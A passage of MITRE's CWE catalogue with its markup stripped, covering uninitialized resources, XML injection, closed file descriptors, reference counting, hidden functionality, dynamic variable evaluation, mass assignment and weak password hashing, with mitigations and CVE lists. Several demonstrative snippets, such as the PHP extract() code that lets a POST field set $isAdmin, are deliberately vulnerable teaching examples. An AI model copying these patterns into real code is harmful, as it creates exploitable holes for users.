not read uninitialized memory + CWE More Abstract + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2012-12-21 + 2.4 + 2013-02-21 + New weakness based on discussion on the CWE research list in December 2012. + + + CWE Content Team + MITRE + 2017-11-08 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples, Observed_Examples + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product does not initialize a critical resource. + Many resources require initialization before they can be properly used. If a resource is not initialized, it could contain unpredictable or expired data, or it could be initialized to defaults that are invalid. This can have security implications when the resource is expected to have certain properties or values. + + + + + + + + Primary + + + Resultant + + + + + + + + Implementation + + + Medium + + + Confidentiality + Read Memory + Read Application Data + When reusing a resource such as memory or a program variable, the original contents of that resource may not be cleared before it is sent to an untrusted party. + + + Availability + DoS: Crash, Exit, or Restart + The uninitialized resource may contain values that cause program flow to change in ways that the programmer did not intend. + + + + + Implementation + Explicitly initialize the resource before use. If this is performed through an API function or standard procedure, follow all specified steps. + + + Implementation + Pay close attention to complex conditionals that affect initialization, since some branches might not perform the initialization. + + + Implementation + Avoid race conditions (CWE-362) during initialization routines. + + + Build and Compilation + Run or compile your product with settings that generate warnings about uninitialized variables or data. + + + + + Here, a boolean initiailized field is consulted to ensure that initialization tasks are only completed once. However, the field is mistakenly set to true during static initialization, so the initialization code is never reached. + + private boolean initialized = true;public void someMethod() { + if (!initialized) { + + + // perform initialization tasks + ... + initialized = true; + } + + + + + + The following code intends to limit certain operations to the administrator only. + + $username = GetCurrentUser();$state = GetStateData($username);if (defined($state)) {$uid = ExtractUserID($state);} + + # do stuff + if ($uid == 0) {DoAdminThings();} + + If the application is unable to extract the state information - say, due to a database timeout - then the $uid variable will not be explicitly set by the programmer. This will cause $uid to be regarded as equivalent to "0" in the conditional, allowing the original user to perform administrator actions. Even if the attacker cannot directly influence the state data, unexpected errors could cause incorrect privileges to be assigned to a user just by accident. + + + The following code intends to concatenate a string to a variable and print the string. + + char str[20];strcat(str, "hello world");printf("%s", str); + + This might seem innocent enough, but str was not initialized, so it contains random memory. As a result, str[0] might not contain the null terminator, so the copy might start at an offset other than 0. The consequences can vary, depending on the underlying memory. + If a null terminator is found before str[8], then some bytes of random garbage will be printed before the "hello world" string. The memory might contain sensitive information from previous uses, such as a password (which might occur as a result of CWE-14 or CWE-244). In this example, it might not be a big deal, but consider what could happen if large amounts of memory are printed out before the null terminator is found. + If a null terminator isn't found before str[8], then a buffer overflow could occur, since strcat will first look for the null terminator, then copy 12 bytes starting with that location. Alternately, a buffer over-read might occur (CWE-126) if a null terminator isn't found before the end of the memory segment is reached, leading to a segmentation fault and crash. + + + This example will leave test_string in an + unknown condition when i is the same value as err_val, + because test_string is not initialized + (CWE-456). Depending on where this code segment appears + (e.g. within a function body), test_string might be + random if it is stored on the heap or stack. If the + variable is declared in static memory, it might be zero + or NULL. Compiler optimization might contribute to the + unpredictability of this address. + + char *test_string; + if (i != err_val) + { + test_string = "Hello World!"; + } + printf("%s", test_string); + + When the printf() is reached, + test_string might be an unexpected address, so the + printf might print junk strings (CWE-457). + + To fix this code, there are a couple approaches to + making sure that test_string has been properly set once + it reaches the printf(). + One solution would be to set test_string to an + acceptable default before the conditional: + + + char *test_string = "Done at the beginning"; + if (i != err_val) + { + test_string = "Hello World!"; + } + printf("%s", test_string); + + Another solution is to ensure that each + branch of the conditional - including the default/else + branch - could ensure that test_string is set: + + char *test_string; + if (i != err_val) + { + test_string = "Hello World!"; + } + else { + test_string = "Done on the other side!"; + } + printf("%s", test_string); + + + + + + CVE-2020-20739 + A variable that has its value set in a conditional statement is sometimes used when the conditional fails, sometimes causing data leakage + https://www.cve.org/CVERecord?id=CVE-2020-20739 + + + CVE-2005-1036 + Chain: Bypass of access restrictions due to improper authorization (CWE-862) of a user results from an improperly initialized (CWE-909) I/O permission bitmap + https://www.cve.org/CVERecord?id=CVE-2005-1036 + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2012-12-21 + 2.4 + 2013-02-21 + New weakness based on discussion on the CWE research list in December 2012. + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples, Observed_Examples + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product does not properly neutralize special elements that are used in XML, allowing attackers to modify the syntax, content, or commands of the XML before it is processed by an end system. + Within XML, special elements could include reserved words or characters such as "<", ">", """, and "&", which could then be used to add new data or modify XML syntax. + + + + + + + + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + + + Confidentiality + Integrity + Availability + Execute Unauthorized Code or Commands + Read Application Data + Modify Application Data + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + + + + + + XML injection (aka Blind Xpath injection) + + + A2 + Injection Flaws + CWE More Specific + + + A6 + Injection Flaws + CWE More Specific + + + 23 + XML Injection + + + SFP24 + Tainted input to command + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + The description for this entry is generally applicable to XML, but the name includes "blind XPath injection" which is more closely associated with CWE-643. Therefore this entry might need to be deprecated or converted to a general category - although injection into raw XML is not covered by CWE-643 or CWE-652. + In vulnerability theory terms, this is a representation-specific case of a Data/Directive Boundary Error. + Under-reported. This is likely found regularly by third party code auditors, but there are very few publicly reported examples. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + Veracode + 2008-08-15 + Suggested OWASP Top Ten 2004 mapping + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Maintenance_Notes, Other_Notes, Theoretical_Notes + + + CWE Content Team + MITRE + 2010-02-16 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2010-06-21 + updated Description, Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-02-18 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2014-06-23 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Modes_of_Introduction, References, Relationships + + + CWE Content Team + MITRE + 2018-03-27 + updated Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, References, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product uses or accesses a file descriptor after it has been closed. + After a file descriptor for a particular file or device has been released, it can be reused. The code might not write to the original file, since the reused file descriptor might reference a different file or device. + + + + + + Primary + + + Resultant + + + + + + + + + + Stale file descriptor + + + + + Implementation + + + Medium + + + Confidentiality + Read Files or Directories + The program could read data from the wrong file. + + + Availability + DoS: Crash, Exit, or Restart + Accessing a file descriptor that has been closed can cause a crash. + + + + + FIO46-C + Do not access a closed file + Exact + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2012-12-21 + 2.4 + 2013-02-21 + New weakness based on discussion on the CWE research list in December 2012. + + + CWE Content Team + MITRE + 2017-11-08 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product uses a reference count to manage a resource, but it does not update or incorrectly updates the reference count. + Reference counts can be used when tracking how many objects contain a reference to a particular resource, such as in memory management or garbage collection. When the reference count reaches zero, the resource can be de-allocated or reused because there are no more objects that use it. If the reference count accidentally reaches zero, then the resource might be released too soon, even though it is still in use. If all objects no longer use the resource, but the reference count is not zero, then the resource might not ever be released. + + + + + + + + Primary + + + + + + + + + + Implementation + + + Medium + + + CVE-2002-0574 + chain: reference count is not decremented, leading to memory leak in OS by sending ICMP packets. + https://www.cve.org/CVERecord?id=CVE-2002-0574 + + + CVE-2004-0114 + Reference count for shared memory not decremented when a function fails, potentially allowing unprivileged users to read kernel memory. + https://www.cve.org/CVERecord?id=CVE-2004-0114 + + + CVE-2006-3741 + chain: improper reference count tracking leads to file descriptor consumption + https://www.cve.org/CVERecord?id=CVE-2006-3741 + + + CVE-2007-1383 + chain: integer overflow in reference counter causes the same variable to be destroyed twice. + https://www.cve.org/CVERecord?id=CVE-2007-1383 + + + CVE-2007-1700 + Incorrect reference count calculation leads to improper object destruction and code execution. + https://www.cve.org/CVERecord?id=CVE-2007-1700 + + + CVE-2008-2136 + chain: incorrect update of reference count leads to memory leak. + https://www.cve.org/CVERecord?id=CVE-2008-2136 + + + CVE-2008-2785 + chain/composite: use of incorrect data type for a reference counter allows an overflow of the counter, leading to a free of memory that is still in use. + https://www.cve.org/CVERecord?id=CVE-2008-2785 + + + CVE-2008-5410 + Improper reference counting leads to failure of cryptographic operations. + https://www.cve.org/CVERecord?id=CVE-2008-5410 + + + CVE-2009-1709 + chain: improper reference counting in a garbage collection routine leads to use-after-free + https://www.cve.org/CVERecord?id=CVE-2009-1709 + + + CVE-2009-3553 + chain: reference count not correctly maintained when client disconnects during a large operation, leading to a use-after-free. + https://www.cve.org/CVERecord?id=CVE-2009-3553 + + + CVE-2009-3624 + Reference count not always incremented, leading to crash or code execution. + https://www.cve.org/CVERecord?id=CVE-2009-3624 + + + CVE-2010-0176 + improper reference counting leads to expired pointer dereference. + https://www.cve.org/CVERecord?id=CVE-2010-0176 + + + CVE-2010-0623 + OS kernel increments reference count twice but only decrements once, leading to resource consumption and crash. + https://www.cve.org/CVERecord?id=CVE-2010-0623 + + + CVE-2010-2549 + OS kernel driver allows code execution + https://www.cve.org/CVERecord?id=CVE-2010-2549 + + + CVE-2010-4593 + improper reference counting leads to exhaustion of IP addresses + https://www.cve.org/CVERecord?id=CVE-2010-4593 + + + CVE-2011-0695 + Race condition causes reference counter to be decremented prematurely, leading to the destruction of still-active object and an invalid pointer dereference. + https://www.cve.org/CVERecord?id=CVE-2011-0695 + + + CVE-2012-4787 + improper reference counting leads to use-after-free + https://www.cve.org/CVERecord?id=CVE-2012-4787 + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2012-12-21 + 2.4 + 2013-02-21 + + + CWE Content Team + MITRE + 2019-06-20 + updated Type + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships, Type + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product contains functionality that is not documented, not part of the specification, and not accessible through an interface or command sequence that is obvious to the product's users or administrators. + Hidden functionality can take many forms, such as intentionally malicious code, "Easter Eggs" that contain extraneous functionality such as games, developer-friendly shortcuts that reduce maintenance or support costs such as hard-coded accounts, etc. From a security perspective, even when the functionality is not intentionally malicious or damaging, it can increase the product's attack surface and expose additional weaknesses beyond what is already exposed by the intended functionality. Even if it is not easily accessible, the hidden functionality could be useful for attacks that modify the control flow of the application. + + + + + + + + + + Architecture and Design + + + Implementation + + + + + Other + Integrity + Varies by Context + Alter Execution Logic + + + + + Installation + Always verify the integrity of the product that is being installed. + + + Testing + Conduct a code coverage analysis using live testing, then closely inspect any code that is not covered. + + + + + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + + CWE Content Team + MITRE + 2012-12-28 + 2.4 + 2013-02-21 + + + CWE Content Team + MITRE + 2017-11-08 + updated Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2022-04-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Applicable_Platforms, Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product does not properly restrict reading from or writing to dynamically-managed code resources such as variables, objects, classes, attributes, functions, or executable instructions or statements. + Many languages offer powerful features that allow the programmer to dynamically create or modify existing code, or resources used by code such as variables and objects. While these features can offer significant flexibility and reduce development time, they can be extremely dangerous if attackers can directly influence these code resources in unexpected ways. + + + + + + Architecture and Design + + + Implementation + + + + + Integrity + Execute Unauthorized Code or Commands + + + Other + Integrity + Varies by Context + Alter Execution Logic + + + + + Fuzzing + Fuzz testing (fuzzing) is a powerful technique for generating large numbers of diverse inputs - either randomly or algorithmically - and dynamically invoking the code with those inputs. Even with random inputs, it is often capable of generating unexpected results such as crashes, memory corruption, or resource consumption. Fuzzing effectively produces repeatable test cases that clearly indicate bugs, which helps developers to diagnose the issues. + High + + + + + Implementation + Input Validation + For any externally-influenced input, check the input against an allowlist of acceptable values. + + + Implementation + Architecture and Design + Refactoring + Refactor the code so that it does not need to be dynamically managed. + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + + CWE Content Team + MITRE + 2013-01-26 + 2.4 + 2013-02-21 + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product does not properly restrict reading from or writing to dynamically-identified variables. + Many languages offer powerful features that allow the programmer to access arbitrary variables that are specified by an input string. While these features can offer significant flexibility and reduce development time, they can be extremely dangerous if attackers can modify unintended variables that have security implications. + + + + + + + Primary + + + + + Implementation + + + + + Integrity + Modify Application Data + An attacker could modify sensitive data or program variables. + + + Integrity + Execute Unauthorized Code or Commands + + + Other + Integrity + Varies by Context + Alter Execution Logic + + + + + Implementation + Input Validation + For any externally-influenced input, check the input against an allowlist of internal program variables that are allowed to be modified. + + + Implementation + Architecture and Design + Refactoring + Refactor the code so that internal program variables do not need to be dynamically identified. + + + + + This code uses the credentials sent in a POST request to login a user. + + + //Log user in, and set $isAdmin to true if user is an administrator + + function login($user,$pass){$query = buildQuery($user,$pass);mysql_query($query);if(getUserRole($user) == "Admin"){$isAdmin = true;}} + $isAdmin = false;extract($_POST);login(mysql_real_escape_string($user),mysql_real_escape_string($pass)); + + The call to extract() will overwrite the existing values of any variables defined previously, in this case $isAdmin. An attacker can send a POST request with an unexpected third value "isAdmin" equal to "true", thus gaining Admin privileges. + + + + + CVE-2006-7135 + extract issue enables file inclusion + https://www.cve.org/CVERecord?id=CVE-2006-7135 + + + CVE-2006-7079 + extract used for register_globals compatibility layer, enables path traversal + https://www.cve.org/CVERecord?id=CVE-2006-7079 + + + CVE-2007-0649 + extract() buried in include files makes post-disclosure analysis confusing; original report had seemed incorrect. + https://www.cve.org/CVERecord?id=CVE-2007-0649 + + + CVE-2006-6661 + extract() enables static code injection + https://www.cve.org/CVERecord?id=CVE-2006-6661 + + + CVE-2006-2828 + import_request_variables() buried in include files makes post-disclosure analysis confusing + https://www.cve.org/CVERecord?id=CVE-2006-2828 + + + CVE-2009-0422 + Chain: Dynamic variable evaluation allows resultant remote file inclusion and path traversal. + https://www.cve.org/CVERecord?id=CVE-2009-0422 + + + CVE-2007-2431 + Chain: dynamic variable evaluation in PHP program used to modify critical, unexpected $_SERVER variable for resultant XSS. + https://www.cve.org/CVERecord?id=CVE-2007-2431 + + + CVE-2006-4904 + Chain: dynamic variable evaluation in PHP program used to conduct remote file inclusion. + https://www.cve.org/CVERecord?id=CVE-2006-4904 + + + CVE-2006-4019 + Dynamic variable evaluation in mail program allows reading and modifying attachments and preferences of other users. + https://www.cve.org/CVERecord?id=CVE-2006-4019 + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2013-01-26 + 2.4 + 2013-02-21 + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product receives input from an upstream component that specifies multiple attributes, properties, or fields that are to be initialized or updated in an object, but it does not properly control which attributes can be modified. + + If the object contains attributes that were only intended for internal use, then their unexpected modification could lead to a vulnerability. + This weakness is sometimes known by the language-specific mechanisms that make it possible, such as mass assignment, autobinding, or object injection. + + + + + + + + Primary + + + + + + + + + + + + Mass Assignment + "Mass assignment" is the name of a feature in Ruby on Rails that allows simultaneous modification of multiple object attributes. + + + AutoBinding + The "Autobinding" term is used in frameworks such as Spring MVC and ASP.NET MVC. + + + PHP Object Injection + Some PHP application researchers use this term for attacking unsafe use of the unserialize() function, but it is also used for CWE-502. + + + + + Architecture and Design + + + Implementation + + + + + Integrity + Modify Application Data + An attacker could modify sensitive data or program variables. + + + Integrity + Execute Unauthorized Code or Commands + + + Other + Integrity + Varies by Context + Alter Execution Logic + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + + If available, use features of the language or framework that allow specification of allowlists of attributes or fields that are allowed to be modified. If possible, prefer allowlists over denylists. + For applications written with Ruby on Rails, use the attr_accessible (allowlist) or attr_protected (denylist) macros in each class that may be used in mass assignment. + + + + Architecture and Design + Implementation + If available, use the signing/sealing features of the programming language to assure that deserialized data has not been tainted. For example, a hash-based message authentication code (HMAC) could be used to ensure that data has not been modified. + + + Implementation + Input Validation + For any externally-influenced input, check the input against an allowlist of internal object attributes or fields that are allowed to be modified. + + + Implementation + Architecture and Design + Refactoring + Refactor the code so that object attributes or fields do not need to be dynamically identified, and only expose getter/setter functionality for the intended attributes. + + + + + CVE-2012-2054 + Mass assignment allows modification of arbitrary attributes using modified URL. + https://www.cve.org/CVERecord?id=CVE-2012-2054 + + + CVE-2012-2055 + Source version control product allows modification of trusted key using mass assignment. + https://www.cve.org/CVERecord?id=CVE-2012-2055 + + + CVE-2008-7310 + Attackers can bypass payment step in e-commerce product. + https://www.cve.org/CVERecord?id=CVE-2008-7310 + + + CVE-2013-1465 + Use of PHP unserialize function on untrusted input allows attacker to modify application configuration. + https://www.cve.org/CVERecord?id=CVE-2013-1465 + + + CVE-2012-3527 + Use of PHP unserialize function on untrusted input in content management system might allow code execution. + https://www.cve.org/CVERecord?id=CVE-2012-3527 + + + CVE-2012-0911 + Use of PHP unserialize function on untrusted input in content management system allows code execution using a crafted cookie value. + https://www.cve.org/CVERecord?id=CVE-2012-0911 + + + CVE-2012-0911 + Content management system written in PHP allows unserialize of arbitrary objects, possibly allowing code execution. + https://www.cve.org/CVERecord?id=CVE-2012-0911 + + + CVE-2011-4962 + Content management system written in PHP allows code execution through page comments. + https://www.cve.org/CVERecord?id=CVE-2011-4962 + + + CVE-2009-4137 + Use of PHP unserialize function on cookie value allows remote code execution or upload of arbitrary files. + https://www.cve.org/CVERecord?id=CVE-2009-4137 + + + CVE-2007-5741 + Content management system written in Python interprets untrusted data as pickles, allowing code execution. + https://www.cve.org/CVERecord?id=CVE-2007-5741 + + + CVE-2011-2520 + Python script allows local users to execute code via pickled data. + https://www.cve.org/CVERecord?id=CVE-2011-2520 + + + CVE-2005-2875 + Python script allows remote attackers to execute arbitrary code using pickled objects. + https://www.cve.org/CVERecord?id=CVE-2005-2875 + + + CVE-2013-0277 + Ruby on Rails allows deserialization of untrusted YAML to execute arbitrary code. + https://www.cve.org/CVERecord?id=CVE-2013-0277 + + + CVE-2011-2894 + Spring framework allows deserialization of objects from untrusted sources to execute arbitrary code. + https://www.cve.org/CVERecord?id=CVE-2011-2894 + + + CVE-2012-1833 + Grails allows binding of arbitrary parameters to modify arbitrary object properties. + https://www.cve.org/CVERecord?id=CVE-2012-1833 + + + CVE-2010-3258 + Incorrect deserialization in web browser allows escaping the sandbox. + https://www.cve.org/CVERecord?id=CVE-2010-3258 + + + CVE-2008-1013 + Media library allows deserialization of objects by untrusted Java applets, leading to arbitrary code execution. + https://www.cve.org/CVERecord?id=CVE-2008-1013 + + + + + + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + The relationships between CWE-502 and CWE-915 need further exploration. CWE-915 is more narrowly scoped to object modification, and is not necessarily used for deserialization. + + + + CWE Content Team + MITRE + 2013-01-26 + 2.4 + 2013-02-21 + + + CWE Content Team + MITRE + 2013-07-17 + updated References + + + CWE Content Team + MITRE + 2017-05-03 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2017-11-08 + updated References + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Alternate_Terms, Potential_Mitigations + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Observed_Examples + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + Dan Amodio, Dave Wichers + Aspect Security + 2013-01-26 + Suggested adding mass assignment, provided references, and clarified relationship with AutoBinding. + + + + + The product generates a hash for a password, but it uses a scheme that does not provide a sufficient level of computational effort that would make password cracking attacks infeasible or expensive. + + Many password storage mechanisms compute a hash and store the hash, instead of storing the original password in plaintext. In this design, authentication involves accepting an incoming password, computing its hash, and comparing it to the stored hash. + Many hash algorithms are designed to execute quickly with minimal overhead, even cryptographic hashes. However, this efficiency is a problem for password storage, because it can reduce an attacker's workload for brute-force password cracking. If an attacker can obtain the hashes through some other method (such as SQL injection on a database that stores hashes), then the attacker can store the hashes offline and use various techniques to crack the passwords by computing hashes efficiently. Without a built-in workload, modern attacks can compute large numbers of hashes, or even exhaust the entire space of all possible passwords, within a very short amount of time, using massively-parallel computing (such as cloud computing) and GPU, ASIC, or FPGA hardware. In such a scenario, an efficient hash algorithm helps the attacker. + There are several properties of a hash scheme that are relevant to its strength against an offline, massively-parallel attack: + + The amount of CPU time required to compute the hash ("stretching") + The amount of memory required to compute the hash ("memory-hard" operations) + Including a random value, along with the password, as input to the hash computation ("salting") + Given a hash, there is no known way of determining an input (e.g., a password) that produces this hash value, other than by guessing possible inputs ("one-way" hashing) + Relative to the number of all possible hashes that can be generated by the scheme, there is a low likelihood of producing the same hash for multiple different inputs ("collision resistance") + + Note that the security requirements for the product may vary depending on the environment and the value of the passwords. Different schemes might not provide all of these properties, yet may still provide sufficient security for the environment. Conversely, a solution might be very strong in preserving one property, which still being very weak for an attack against another property, or it might not be able to significantly reduce the efficiency of a massively-parallel attack. + + + + + + + + Primary + + + + + + + + Architecture and Design + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + + + Access Control + Bypass Protection Mechanism + Gain Privileges or Assume Identity + If an attacker can gain access to the hashes, then the lack of sufficient computational effort will make it easier to conduct brute force attacks using techniques such as rainbow tables, or specialized hardware such as GPUs, which can be much faster than general-purpose CPUs for computing hashes. + + + + + Automated Static Analysis - Binary or Bytecode + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Bytecode Weakness Analysis - including disassembler + source code weakness analysis + Binary Weakness Analysis - including disassembler + source code weakness analysis + + + + SOAR Partial + + + Manual Static Analysis - Binary or Bytecode + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies + + + + SOAR Partial + + + Manual Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Focused Manual Spotcheck - Focused manual analysis of source + Manual Source Code Review (not inspections) + + + + High + + + Automated Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Source code Weakness Analyzer + Context-configured Source Code Weakness Analyzer + + + + High + + + Automated Static Analysis + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Configuration Checker + + + + SOAR Partial + + + Architecture or Design Review + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Formal Methods / Correct-By-Construction + + Cost effective for partial coverage: + + Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) + + + + High + + + + + Architecture and Design + + Use an adaptive hash function that can be configured to change the amount of computational effort needed to compute the hash, such as the number of iterations ("stretching") or the amount of memory required. Some hash functions perform salting automatically. These functions can significantly increase the overhead for a brute force attack compared to intentionally-fast functions such as MD5. For example, rainbow table attacks can become infeasible due to the high computing overhead. Finally, since computing power gets faster and cheaper over time, the technique can be reconfigured to increase the workload without forcing an entire replacement of the algorithm in use. + Some hash functions that have one or more of these desired properties include bcrypt [REF-291], scrypt [REF-292], and PBKDF2 [REF-293]. While there is active debate about which of these is the most effective, they are all stronger than using salts with hash functions with very little computing overhead. + Note that using these functions can have an impact on performance, so they require special consideration to avoid denial-of-service attacks. However, their configurability provides finer control over how much CPU and memory is used, so it could be adjusted to suit the environment's needs. + + High + + + Implementation + Architecture and Design + When using industry-approved techniques, use them correctly. Don't cut corners by skipping resource-intensive steps 